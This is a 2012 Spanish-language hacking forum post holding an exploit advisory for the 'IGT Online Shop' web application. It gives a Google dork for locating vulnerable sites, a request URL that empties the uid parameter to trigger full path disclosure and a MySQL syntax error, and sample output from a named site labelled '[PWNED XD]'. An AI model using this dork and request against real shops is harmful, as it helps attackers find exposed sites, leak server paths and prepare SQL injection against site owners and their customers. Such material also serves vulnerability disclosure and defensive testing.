Exploit Full path disclosure and Sql Error ONLINE SHOP IGT

Iniciado por MaztoR, Abril 05, 2012, 09:20:06 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Abril 05, 2012, 09:20:06 PM Ultima modificación: Abril 05, 2012, 10:39:22 PM por MaztoR
Código: php
# Author: Mazt0r
# Exploit Title: Full path disclosure and Sql Error ONLINE SHOP IGT
# Date: 24/02/2012
# software: IGT Online Shop
# link: http://www.igt.com.hk
# Version: ALL
# Category: webapps
# Google dork: inurl:company_index.php
# Tested on: Linux



----------------
Vulnerability
----------------

Exploit:
======================

http://localhost/path/company_index.php?id=[ID#NUMBER]&file=home&prod=&uid=[FPD & ERROR SQL]

======================
Example:
======================

http://Mazt0rsite.com/company_index.php?id=245&file=home&prod=prod&uid=

Result FPD: Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/Mazt0rsite/path/path2/public_html/company_index.php on line 3

Regular Result2: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1 [PWNED XD]



----------------------------------
Blog: maztor.blogspot.com
Twitter: @Mazt0r
----------------------------------
======================== Camaradas! DDLR & CL ========================================
Greetz : zer0-zo0rg | Zeux0r | SeguridadBlanca | k4rl | Pum4 | TheLatin | 4t0m1x | Destroyer
-------------------------------------------------------------------------------------
-------------------------------------
| Twitter: @Mazt0r                
| Site: www.maztor.com        
| Skype: Maztor-                    
-------------------------------------